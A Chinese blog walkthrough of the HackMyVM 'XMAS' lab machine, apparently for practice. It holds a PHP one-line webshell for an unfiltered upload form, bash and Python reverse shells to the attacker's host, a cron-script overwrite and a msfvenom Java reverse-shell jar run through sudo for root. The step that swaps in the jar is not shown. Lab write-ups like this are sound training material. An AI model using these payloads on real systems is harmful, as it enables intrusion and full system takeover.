[HackMyVM]靶场 XMAS

最新推荐文章于 2024-06-20 15:12:26 发布
最新推荐文章于 2024-06-20 15:12:26 发布
阅读量494 收藏 1
点赞数 17
分类专栏: hackmyvm 文章标签: 网络空间安全 内网渗透 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34942239/article/details/136948821
版权

kali:192.168.56.104

靶机:192.168.56.126

注意在/etc/hosts 添加 192.168.56.126 christmas.hmv

# cat /etc/hosts                                    
127.0.0.1       localhost
127.0.1.1       kali2
192.168.223.131 dc-2
192.168.223.134 wordy
192.168.56.105 midnight.coffee dev.midnight.coffee
192.168.56.108 adria.hmv
192.168.56.112 redrocks.win
192.168.56.126 christmas.hmv

端口扫描

# nmap 192.168.56.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-22 18:16 CST
Nmap scan report for christmas.hmv (192.168.56.126)
Host is up (0.00034s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

开了22 80端口

扫一下目录

# gobuster dir -u http://christmas.hmv -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://christmas.hmv
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,bak,zip,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/images               (Status: 301) [Size: 315] [--> http://christmas.hmv/images/]
/index.php            (Status: 200) [Size: 22962]
/uploads              (Status: 301) [Size: 316] [--> http://christmas.hmv/uploads/]
/php                  (Status: 301) [Size: 312] [--> http://christmas.hmv/php/]
/css                  (Status: 301) [Size: 312] [--> http://christmas.hmv/css/]
/js                   (Status: 301) [Size: 311] [--> http://christmas.hmv/js/]
/javascript           (Status: 301) [Size: 319] [--> http://christmas.hmv/javascript/]
/fonts                (Status: 301) [Size: 314] [--> http://christmas.hmv/fonts/]

通过目录扫面可以初步判断有文件上传

看web

web往下滑看到文件上传点

随便传个php发现没有过滤

<?=`$_GET[0]`;

反弹shell

http://christmas.hmv/uploads/shell2.php?0=bash -c 'bash -i >%26 %2Fdev%2Ftcp%2F192.168.56.104%2F4567%20 0>%261'
# nc -lvnp 4567      
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.126] 55154
bash: cannot set terminal process group (668): Inappropriate ioctl for device
bash: no job control in this shell
www-data@xmas:/var/www/christmas.hmv/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@xmas:/var/www/christmas.hmv/uploads$

pspy64扫一下

www-data@xmas:/var/www/christmas.hmv/uploads$ wget http://192.168.56.104:6677/pspy64
www-data@xmas:/var/www/christmas.hmv/uploads$ chmod +x pspy64
www-data@xmas:/var/www/christmas.hmv/uploads$ ./pspy64

2024/03/22 10:22:47 CMD: UID=1000 PID=25019  | /bin/bash 
2024/03/22 10:22:47 CMD: UID=1000 PID=25018  | /usr/bin/python3 /opt/NiceOrNaughty/nice_or_naughty.py 
2024/03/22 10:22:47 CMD: UID=1000 PID=25017  | /bin/sh -c /usr/bin/python3 /opt/NiceOrNaughty/nice_or_naughty.py 
2024/03/22 10:22:47 CMD: UID=0    PID=25016  | /usr/sbin/CRON -f -P 
2024/03/22 10:22:47 CMD: UID=0    PID=25     | 
2024/03/22 10:22:47 CMD: UID=33   PID=24996  | /bin/bash 
2024/03/22 10:22:47 CMD: UID=33   PID=24995  | sh -c /bin/bash 
2024/03/22 10:22:47 CMD: UID=33   PID=24994  | /usr/bin/script -qc /bin/bash /dev/null 
2024/03/22 10:22:47 CMD: UID=33   PID=24980  | /bin/bash 
2024/03/22 10:22:47 CMD: UID=33   PID=24979  | sh -c /bin/bash 
2024/03/22 10:22:47 CMD: UID=33   PID=24978  | /usr/bin/script -qc /bin/bash /dev/null 
2024/03/22 10:22:47 CMD: UID=0    PID=24694  | 
2024/03/22 10:22:47 CMD: UID=0    PID=24693  | 
2024/03/22 10:22:47 CMD: UID=33   PID=24590  | bash -i 
2024/03/22 10:22:47 CMD: UID=33   PID=24589  | bash -c bash -i >& /dev/tcp/192.168.56.104/4567  0>&1 
2024/03/22 10:22:47 CMD: UID=33   PID=24588  | sh -c bash -c 'bash -i >& 
....
2024/03/22 10:22:47 CMD: UID=0    PID=1      | /sbin/init 
2024/03/22 10:23:36 CMD: UID=0    PID=25227  | 
2024/03/22 10:24:01 CMD: UID=0    PID=25228  | /usr/sbin/CRON -f -P 
2024/03/22 10:24:01 CMD: UID=1000 PID=25229  | /bin/sh -c /usr/bin/python3 /opt/NiceOrNaughty/nice_or_naughty.py 
2024/03/22 10:24:01 CMD: UID=1000 PID=25230  | /usr/bin/python3 /opt/NiceOrNaughty/nice_or_naughty.py

发现会定时执行一个python脚本/opt/NiceOrNaughty/nice_or_naughty.py 

www-data@xmas:/var/www/christmas.hmv/uploads$ ls -al /opt/NiceOrNaughty/nice_or_naughty.py 
<oads$ ls -al /opt/NiceOrNaughty/nice_or_naughty.py 
-rwxrwxrw- 1 root root 216 Mar 22 10:03 /opt/NiceOrNaughty/nice_or_naughty.py

这个py文件是可以修改的,那么直接改成反弹shell

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.104",4567));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' >/opt/NiceOrNaughty/nice_or_naughty.py

kali开个监听然后登就行了

# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.126] 53012
alabaster@xmas:~$ ls -al
ls -al
total 60
drwxr-x--- 7 alabaster alabaster 4096 Nov 20 18:43 .
drwxr-xr-x 9 root      root      4096 Nov 19 22:29 ..
-rw------- 1 alabaster alabaster  791 Nov 20 19:28 .bash_history
-rw-r--r-- 1 alabaster alabaster  220 Jan  7  2023 .bash_logout
-rw-r--r-- 1 alabaster alabaster 3771 Jan  7  2023 .bashrc
drwx------ 3 alabaster alabaster 4096 Nov 19 11:07 .cache
drwxrwxr-x 4 alabaster alabaster 4096 Nov 19 11:08 .local
-rw-rw-r-- 1 alabaster alabaster   46 Mar 22 10:02 naughty_list.txt
-rw-rw-r-- 1 alabaster alabaster   13 Mar 22 10:02 nice_list.txt
drwxrwxr-x 2 alabaster alabaster 4096 Nov 19 21:50 NiceOrNaughty
-rw-r--r-- 1 alabaster alabaster  807 Jan  7  2023 .profile
drwxrwxr-x 2 alabaster alabaster 4096 Nov 20 18:45 PublishList
-rw-rw-r-- 1 alabaster alabaster   66 Nov 19 21:43 .selected_editor
drwx------ 2 alabaster alabaster 4096 Nov 17 17:32 .ssh
-rw-r--r-- 1 alabaster alabaster    0 Nov 17 17:34 .sudo_as_admin_successful
-rw-rw---- 1 alabaster alabaster  849 Nov 19 09:08 user.txt
alabaster@xmas:~$ cat user.txt
cat user.txt
    ||::|:||   .--------,
    |:||:|:|   |_______ /        .-.
    ||::|:|| ."`  ___  `".    {\('v')/}
    \\\/\///:  .'`   `'.  ;____`(   )'___________________________
     \====/ './  o   o  \|~     ^" "^                          //
      \\//   |   ())) .  |   Merry Christmas!                   \
       ||     \ `.__.'  /|                                     //
       ||   _{``-.___.-'\|   Flag: HMV{7bMJ6js7guhQadYDTmBt}    \
       || _." `-.____.-'`|    ___                              //
       ||`        __ \   |___/   \______________________________\
     ."||        (__) \    \|     /
    /   `\/       __   vvvvv'\___/
    |     |      (__)        |
     \___/\                 /
       ||  |     .___.     |
       ||  |       |       |
       ||.-'       |       '-.
       ||          |          )
       ||----------'---------'

弹回来的是alabaster用户的权限并且拿到user flag

sudo -l发现可以提权

alabaster@xmas:~$ sudo -l
sudo -l
Matching Defaults entries for alabaster on xmas:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User alabaster may run the following commands on xmas:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /usr/bin/java -jar
        /home/alabaster/PublishList/PublishList.jar

可以用root权限执行 /usr/bin/java /home/alabaster/PublishList/PublishList.jar

并且这个jar是alabaster用户的,我们可以自己重写一个jar反弹用来反弹shell

alabaster@xmas:~$ ls -al /home/alabaster/PublishList/PublishList.jar
ls -al /home/alabaster/PublishList/PublishList.jar
-rwxrwxr-x 1 alabaster alabaster 7505 Mar 22 10:09 /home/alabaster/PublishList/PublishList.jar

用kali生成

msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.104 LPORT=4567 -f jar -o shell.jar

传到靶机上

labaster@xmas:~$ wget http://192.168.56.104:6677/shell.jar
alabaster@xmas:~$ chmod +x shell.jar
alabaster@xmas:~$ sudo /usr/bin/java -jar /home/alabaster/PublishList/PublishList.jar

成功提权

# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.126] 48214
id
uid=0(root) gid=0(root) groups=0(root)

tao0845
关注
  • 17
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Xmas
10-25
Xmas
xmas
03-14
xmas
xmas-console
06-22
圣诞控制台 基于 Web 的圣诞控制台可让雨鹿远离 示例命令模块: define ( [ 'modules/output' , 'modules/chat' ] , function ( output , chat ) { // call output.print(message) to display things ...
Xmas Regular
10-28
Xmas Regular
面试经验分享 | 24年6月某安全厂商HW面试经验
zkaqlaoniao的博客
06-17 600
也希望大家有什么护网相关的需求和建议都可以留在评论区,大家讨论下,嘿嘿嘿,希望大家伙都可以通过今年的护网面试。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。反射型XSS:反射型XSS攻击是一次性的攻击,当受害者点击恶意链接url的时候,恶意代码会直接在受害者的主机上的浏览器执行。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
在物联网设备安全中,如何有效进行固件更新管理?
2403_84237550的博客
06-17 410
• 更新后持续监控设备状态,评估更新效果,及时发现并解决更新带来的新问题。在物联网设备安全中,有效进行固件更新管理是一个关键环节,涉及到多个步骤和策略,以确保更新过程既安全又高效。• 在部署固件更新前,进行全面的安全验证和兼容性测试,确保更新包的来源可靠,未被篡改,并且不会影响设备的正常运行。• 记录每次固件更新的详细信息,包括更新时间、版本号、更新内容和操作人员等,以便追溯和审计。• 加强用户对固件更新重要性的认识,教育用户如何正确执行和验证更新,提升整体安全意识。
MVC 框架安全
A526847的博客
06-17 614
举例来说,在“注入攻击”一章中,我们并没有使用 PHP 的 magic_quotes_gpc 作为一项 对抗 SQL 注入的防御方案,这是因为 magic_quotes_gpc 是有缺陷的,它并没有在正确的地方 解决问题。其次,对于一些常见的漏洞来说,由程序员一个个修补可能会出现遗漏,而在框架中统一 解决,有可能解决“遗漏”的问题。最后,在每个业务里修补安全漏洞,补丁的标准难以统一,而在框架中集中实施的安全方 案,可以使所有基于框架开发的业务都能受益,从安全方案的有效性来说,更容易把握。
【安全】Linux Fanotify使用入门
追寻梦想的青春
06-19 715
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
网络安全:Web 安全 面试题.(XSS)
最新发布
网络安全领域___专研者.
06-20 846
网络安全面试是指在招聘过程中,面试官会针对应聘者的网络安全相关知识和技能进行评估和考察。这种面试通常包括以下几个方面: (1)基础知识:包括网络基础知识、操作系统知识、密码学知识等。 (2)安全技术:如入侵检测、防火墙配置、密码管理、漏洞分析等技术的掌握程度。 (3)安全实践:评估应聘者在实际工作中解决网络安全问题的能力,如案例分析、渗透测试等。 (4)安全意识:了解应聘者对网络安全的重视程度和责任心,以及在安全事故发生时的应对能力。 (5)项目经验:询问应聘者参与过的网络安全相关项目,了解其在项目中的具体
揭秘网络安全攻防战
waitaikong_的博客
06-17 586
随着互联网的普及,网络安全成为企业和个人关注的焦点。网络安全不仅关系到个人隐私的保护,还影响到企业的商业机密和国家的主权安全。因此,了解和掌握网络安全攻防战的相关知识,对于构建稳固的网络防御体系至关重要。网络安全攻防战是一场没有硝烟的战争,它要求我们不仅要了解当前的攻防技术,还要预见未来可能出现的新威胁,并提前做好准备。通过不断的学习和实践,我们可以提高自己在这方面的知识和技能,为保护网络安全贡献力量。未来的攻击手段将更加多样化和复杂化,防御策略也需要不断地更新和升级以应对新的挑战。
腾讯云 - 边缘安全加速平台 EO、内容分发网络 CDN、全站加速网络 ECDN、安全加速 SCDN 等产品对比
牧码的博客
06-20 275
腾讯云 - 边缘安全加速平台 EO、内容分发网络 CDN、全站加速网络 ECDN、安全加速 SCDN 等产品对比
登录安全分析报告:链家地产
Explinks的博客
06-20 940
图形验证及交互验证方式的安全性到底如何?请看具体分析。
餐饮食堂安全守护者:可燃气体报警器故障处理与检测要点解析
BDjiance的博客
06-17 402
在餐饮食堂中,可燃气体报警器的正常运行对于预防火灾和保障人员安全至关重要。接下来,佰德将围绕可燃气体报警器的故障现象识别、原因排查、安全操作准则、专业工具与备件、故障处理步骤、验证与测试以及维护与保养建议等方面进行详细阐述,帮助相关人员更好地应对可燃气体报警器故障。
【RK3588/算能/Nvidia智能盒子】AI算法应用于中国生物疫苗生产过程智能监测,赋能生产安全,提升品质管控
YEYUANGEN的专栏
06-19 841
AI赋能医药疫苗安全生产,将被动“监督”变为主动“监控”,事前实时预警,事中常态监测,事后规范管理,实现车间作业标准化、人员行为可控化、决策分析层级化,真正做到疫苗生产过程的信息化管理。基于计算机视觉检测技术在疫苗生产过程中标准动作及流程监管方面拥有的巨大潜力,将深入药企生产的更多场景,研发更多优质实用的AI视觉算法,推动医药行业的智能化发展。,大大提高检测效率,有着传统人工目检不具备的优势,对食品药品生产过程的风险排查及质量管控提供了新的监管思路。等,实现疫苗生产中灭活剂添加流程的规范性监管。
渗透测试之内核安全系列课程:Rootkit技术初探(六)
fearhacker的专栏
06-19 749
例如,它包含驱动类型、驱动大小、驱动对象、驱动标志、驱动的起始位置、驱动的大小、指向驱动程序映像的内存区对象、驱动的扩展空间、驱动名字等。DRIVER_OBJECT对象还包含了与驱动程序所管理的设备对象相关联的设备扩展结构,以及用于处理I/O请求的函数指针等信息。:这是一个指针,指向驱动程序所创建的设备对象链表的头部。:指向注册表中的硬件信息路径,为驱动程序提供设备特定的配置和参数( 在Windows内核模式驱动程序中,硬件数据库用于存储有关系统中所有设备实例的信息,如设备的设备路径、设备对象指针等 )。
腾讯云API安全保障措施?有哪些调用限制?
danplus的博客
06-20 701
用户在使用腾讯云API时,应充分利用这些安全功能,并遵循相关安全建议,以最大限度地降低安全风险。AokSend,结合API/SMTP接口与腾讯云API,邮件发送更高效、更稳定,为您的邮件营销提供强大支持!
【功能详解】银河麒麟操作系统“安全启动”是如何发挥作用的?
银河麒麟操作系统的博客
06-17 503
安全体系的构建离不开操作系统本身的硬实力,更离不开与上下游伙伴用户产品合力共建。其中,安全启动(Secure Boot)作为一项至关重要的安全技术,成为现代计算机系统安全的一道坚固防线,尤其在搭载国产操作系统与UEFI(统一可扩展固件接口)的设备上,展现出了非凡的安全
视频共享融合赋能平台LntonCVS视频监控业务平台建设安全煤矿矿井应用方案
Lnton羚通科技
06-20 372
随着我国经济的飞速增长,煤炭作为主要的能源之一,在我国的能源结构中扮演着至关重要的角色。然而,煤矿事故的频繁发生,不仅造成了巨大的人员伤亡和财产损失,也对社会产生了深远的负面影响。因此,实现煤矿的智能化无人开采及安全生产,视频监控系统成为了关键所在。视频监控方案能够实时监测煤矿生产现场的情况,及时发现潜在的安全隐患并采取相应的措施,从而有效地预防事故的发生。该平台支持多协议和设备的接入,能够汇聚和管理大量的视频流数据,支持多种格式的转发和多终端的浏览,全面满足煤矿安防监控的需求。
如何确保远程桌面安全
Canon_YK的博客
06-17 276
然而,随着技术的不断发展和安全威胁的不断变化,我们还需要不断探索和创新,寻找更加高效和智能的安全防护手段,为远程桌面提供更加可靠和安全的保障。某企业采用深信达MCK主机加固系统,该系统基于可信计算技术,锁定工作场景、实行严格场景白名单控制,受保护的主机只能做白名单规定的事情,任何白名单之外的、陌生程序都无法运行。以不变应万变,彻底杜绝病毒骚扰,保护业务服务器主机和产线工控设备主机的安全加强远程桌面的安全防护,通过配置客户端验证和IP地址过滤规则,成功阻止了一起针对远程桌面的非法访问事件。
nmap用XMAS扫描的指令
09-22
nmap用于执行网络扫描,其中之一是XMAS扫描。XMAS扫描是一种用于探测目标主机上指定端口是否开放的扫描技术。在XMAS扫描中,发送一个不完整的TCP包给目标主机的指定端口,该包中设置了FIN,URG,和PSH标志位。如果...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值